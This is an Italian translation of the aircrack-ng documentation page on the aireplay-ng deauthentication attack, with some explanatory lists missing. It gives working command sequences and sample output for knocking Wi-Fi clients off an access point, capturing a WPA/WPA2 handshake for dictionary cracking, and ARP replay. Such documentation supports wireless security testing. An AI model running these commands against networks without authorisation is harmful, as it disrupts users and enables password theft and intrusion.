Table of Contents

Deauthentication

Descrizione

Questo attacco invia pacchetti di disconnessione ad uno o piu' client associati ad un determinato access point. Disconnettere i client puo' essere utile per varie ragioni:

Ovviamente quest'attacco e' inutile se non vi sono client associati o su autenticazioni fasulle (ottenute con un attacco fake authentication).

Utilizzo

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Dove:

Esempi

Tipica Disconnessione

Per prima cosa occorre verificare che vi siano client connessi. Per il seguente comando infatti occorre conoscere un MAC address:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Dove:

Di seguito l'output del comando precedente:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Catturare un handshake WPA/WPA2 con una Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (su un'altra console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Di seguito la spiegazione dei comandi soprastanti:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Dove:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Dove:

Di seguito l'output del comando “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

Generazione di ARP request con una scheda Prism2

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (su un'altra console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

Dopo aver inviato un blocco di 10 pacchetti di disconnessione, occorre mettersi in ascolto per pacchetti ARP request utilizzando l'attacco 3. E' consigliato usare l'opzione -h specificando il MAC address di un client associato.

Se il driver utilizzato e' wlan-ng/, occorre utilizzare lo script airmon-ng altrimenti la scheda non funzionera' correttamente durante l'injection.

Suggerimenti

Solitamente e' piu' efficiente specificare un client vittima con il parametro -c.

I pacchetti di disconnessione sono inviati direttamente dal PC ai client. Cosi' occorre essere fisicamente vicini in modo tale che i client possano ricevere i pacchetti trasmessi dalla scheda wireless.

Risoluzione dei problemi

Perche' l'attacco deauthentication non funziona?

Possono esserci diversi motivi ed uno o piu' di questi potrebbero essere la causa:

In generale

Vedere la voce risoluzione dei problemi nella pagina generale di aireplay-ng.

Note sulle prossime release o versioni SVN

Questa sezione si riferisce SOLO all'ultima versione SVN e ad alcune release candidate come prossime della suite di aircrack-ng. Una volta che queste verranno rilasciate come stabili, la documentazione soprastante verrà aggiornata.

Per disconnessioni dirette, aireplay-ng invia un totale di 128 pacchetti per ogni deauth specificata. 64 pacchetti sono inviati all'AP stesso ed altri 64 al client.

Di seguito un tipico comando:

  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0 

Di seguito un tipico output:

 12:35:25  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

Ed ecco il significato di “[ 61|63 ACKs]”: